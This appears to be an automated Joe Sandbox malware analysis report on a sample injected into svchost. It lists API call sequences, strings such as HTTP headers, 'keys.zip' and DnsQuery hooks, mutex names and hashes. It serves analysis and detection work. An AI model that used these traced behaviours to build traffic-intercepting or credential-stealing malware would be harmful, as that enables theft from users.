                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1532f9457d04f957666a4081261d1cacc261c0dd115bfecdc087baa5c066f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0101D630AC67127BF37157A84C4AF8E36989F04B95F104654FB6A761C097E095048BAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBEB74
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEBD5
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEC91
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02BBF9DF,?,?,Host,?,?), ref: 02BBEDD3
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02BBF9DF,?,?,Host,?,?), ref: 02BBEE8E
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02BBF9DF,?,?), ref: 02BBEE9F
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02BBEED1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                                • API String ID: 438689982-3158524741
                                                                                                                                                                                                                • Opcode ID: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                                • Instruction ID: 4510274edb432ebf6a99fc4607050113ddef9785de68b889f654054b6fdf902a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2D1F532A042155FEF338E68C8847FEB7A6EF45314F9845D9E906AB261D7F0D842CB91
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                • API String ID: 761212885-1876038977
                                                                                                                                                                                                                • Opcode ID: 977df05948f24d9b64c341ce70a8de0fcabcea6c7e5d77ea2ac86cd2c8b5e848
                                                                                                                                                                                                                • Instruction ID: a4fd0f858a9b8fb7590d9d2e8e4530977a2abbe9d526a93523c36a7d6bc29179
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 977df05948f24d9b64c341ce70a8de0fcabcea6c7e5d77ea2ac86cd2c8b5e848
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3951313194464A4FCB1ACB7C98657FA7BF6EF4A300F1485E4D9CAD7240EB719948C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 02BC92D9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC930C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC9338
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC935F
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?), ref: 02BC9392
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC93AC
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC93B3
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC93C3
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02BC93CE
                                                                                                                                                                                                                • WSASetLastError.WS2_32(?), ref: 02BC9414
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                                • String ID: GET $POST
                                                                                                                                                                                                                • API String ID: 1455188016-2494278042
                                                                                                                                                                                                                • Opcode ID: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                                • Instruction ID: 22b8a80819cfffc0950c52264a6ad5fb85c2a779152fd9903f27daa9a5c84b96
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C4120B1D00608EFEB60DFA8D884AEEBBF9EF48704F54456DE515E7200E774A9018FA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,75573050,755730D0,75573080), ref: 02BB91F0
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB9204
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB920F
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02BB9237
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB9254
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB9265
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BB9285
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BB929C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB92DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB9324
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB932D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2125184990-465009422
                                                                                                                                                                                                                • Opcode ID: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                                • Instruction ID: c0ef45637424ea677fc3a5773095195ce87454e17970645b28d93282a4fe0ba3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC41E071E80240ABD7209FA4EC84FBA77A9AB48750F104E45FB61972C6C6F0E820CF60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC040B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC040E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC041B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC041E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0437
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC0448
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0458
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC045B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC0468
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC046B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC047B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC047E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC048B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC048E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2935687291-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB6350
                                                                                                                                                                                                                • DnsFlushResolverCache.DNSAPI ref: 02BB635A
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75497390), ref: 02BB636A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02BB6383
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02BB639F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02BB63BB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02BB63D7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                                • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                                • API String ID: 2466897691-3547598143
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCCBF5
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D73AC,BSS), ref: 02BCCC0F
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                                • String ID: 617D73AC$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                                • API String ID: 3206501308-1718476822
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF88F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF892
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF89B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF89E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8B1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8B4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF8BD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8C0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF8D3
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8D6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF8DF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8E2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8F5
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8F8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF901
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF904
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 02BDE265
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 02BDE281
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 02BDE29B
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 02BDE2B1
                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BDE2DC
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02BDE302
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BDE375
                                                                                                                                                                                                                • free.MSVCRT ref: 02BDE40A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • %02d/%02d/%04d %02d:%02d, xrefs: 02BDE2D6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                                • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                                • API String ID: 3846129198-4051342895
                                                                                                                                                                                                                • Opcode ID: 815f13543e958ab895e0e894ef79a620a7f471f571f65d0eaebb03e296fd4bce
                                                                                                                                                                                                                • Instruction ID: 887121f4bb99086a578a7920b41cd7d38fa120a3e3618f651d0293b2a620aff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 815f13543e958ab895e0e894ef79a620a7f471f571f65d0eaebb03e296fd4bce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F6105719006099FCB21CF68DC44BFEBBF4EF49310F1086A9E94A9B241EB31E555CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB843
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBB870
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBB877
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBB889
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBB898
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBB8A2
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB8B4
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBB8E1
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBB8E8
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,?), ref: 02BBB8FB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2596333622-465009422
                                                                                                                                                                                                                • Opcode ID: 32c42720bc7eaf99465c94e3fdf705d3334006c8905539312b91ac6555d4e502
                                                                                                                                                                                                                • Instruction ID: 313fceac71f9d7898753e195fe1b4421e56a67101b079f5dc775f0d645c1fd9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32c42720bc7eaf99465c94e3fdf705d3334006c8905539312b91ac6555d4e502
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21B431A811149BC7644F69A84CEFAB7E8EF487A1B458966F705D72A1C3B09421CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                  • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                  • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                  • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                  • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                  • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1392322707-905597979
                                                                                                                                                                                                                • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD440C
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD4422
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD4430
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD4439
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4451
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4463
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD446E
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02C0D19C,VEFK), ref: 02BD4488
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$VEFK
                                                                                                                                                                                                                • API String ID: 849374196-2091915041
